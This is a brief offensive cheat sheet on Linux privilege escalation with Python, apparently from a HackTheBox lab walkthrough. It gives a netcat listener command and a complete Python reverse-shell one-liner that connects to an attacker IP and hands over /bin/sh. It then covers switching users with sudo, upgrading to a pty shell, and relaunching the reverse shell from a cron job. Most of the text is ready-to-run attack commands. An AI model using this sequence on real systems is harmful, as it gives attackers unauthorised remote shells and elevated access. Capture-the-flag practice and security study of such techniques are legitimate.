Privilege Escalation

python privilege escalation

requirements: Need to be able to plant a *.py or modify an existing one as a higher privileged user

more at apt-secure.ca

You currently have a terminal( be that in a browser or by some other means). Here are some things to do with python.

  • Quickly determine versions of local python

    • #whereis python

    • #python -c 'import sys; print(sys.path)' -->get path

  • open listener on attacking machine

    • #nc -nlvp 444

    • from target terminal(web) run python

python -c 'import socket,subprocess,os;

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.157",1235));

os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

  • attacking machine should have shell

  • do you have a list of users?

    • yes

      • because you know users and you know their shells we can potentially switch to that user

      • #sudo -u <diff user name> /bin/bash (or whatever their shell is)

      • upgrade shell with python

        • #python -c 'import pty; pty.spawn("/bin/bash");'

        • you may have root at this point

        • you can do a reverse shell from this account

          • open listener on attacker

          • run reverse shell script above. In some scenarios you may need to run the script from an already running cronjob

    • no

      • you may not need escalation at this point, but unlikely

Reference:

[1] https://danishzia.medium.com/hackthebox-htb-bashed-walkthrough-ab402b9f4715